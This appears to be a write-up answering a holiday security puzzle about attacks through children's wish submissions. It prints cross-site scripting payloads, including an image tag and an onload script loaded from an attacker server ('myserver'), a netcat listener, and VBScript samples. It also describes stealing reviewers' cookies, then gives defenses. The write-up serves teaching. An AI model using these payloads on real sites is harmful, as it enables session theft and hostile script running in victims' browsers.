By Ron SweeneyWhat is the purpose of the first malicious wish text, and how does it work?
The purpose of the first text was to test whether the child could embed javascript into the wish form and reference a site outside of the submission server ("bumblesnowmonster.com.")
For example if the child put:
<IMG ID="Picture" HEIGHT=0 WIDTH=0 SRC="http://www.bumblesnowmonster.com/Sample.jpg" BORDER=0>
The analyst elf would see "nothing" or a broken image
embedded in the submission. Typicallyyou can use a transparent 1 X 1 image to accomodate this task.
You could also tail the log of "bumblesnowmonster.com", bounce it off a rogue mail script, or setup nc -l
-p 80 to see exactly when, with what reviewed the "wish."It could then be easily used to embed javascript like below (IE6) which refers to a script on the evil childs server (you could I supposed embed the
whole javascriptif there are no controls in place to block <javascript tags):
<img src='http://www.bumblesnowmonster.com/clear.gif' onload='document.scripts(0).src="http://myserver/eviljavUrscript.js"'
This would make the script source the source of the first page and make the analyst's browser
load and execute the evil script. The script here could be something like:
<SCRIPT LANGUAGE=VBScript>
Set WWObj = CreateObject("Word.Document")
WWObj.SaveAs("c:\resume.doc")
</SCRIPT>
or
document.write("I just ate 37 bytes on your hard drive")
or
<script LANGUAGE="VBScript">
<!--
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
End If
-->
</SCRIPT>
which makes for a great coffee holder!
2. What is the purpose of the second malicious wish text, and how does it work?
The second
wish actually embeds the elves cookie as an argument to a script on the "http://myserver" from there it can be "dug out" of the server requests on "myserver" so the evil children can acces
the same list as the analysts. Probably write a cool script called naughty2nice.pl and post it to BUGTRAQ too.
3. How could Hermey and Rudolph thwart the first and second types of attacks by altering the
Web application? Alternatively, how could they stop these attacks by changing the configuration of the
analyst elves' browsers?
You can lock down the web application by disabling cross-site scripting or by
ignoring certain input types in the text box for the front end of the submissions.
You can lock down down th broswers by locking down the browser to disable or prompt "access data sources across domains" or
high settings on javUrscript.
4. Beyond these browser-based attacks, Hermey was also concerned about attackers submitting similar elements in children's wish lists submitted via e-mail. What are two different
methods for defeating such attacks by altering an e-mail reader's configuration?
Turn off html or html with "preview" functionality on a mail reader. Also, some operating systems share the same security
mechanism across mail readers and internet applications, in either case you can disable or prompt "access data sources across domains" in the same manner.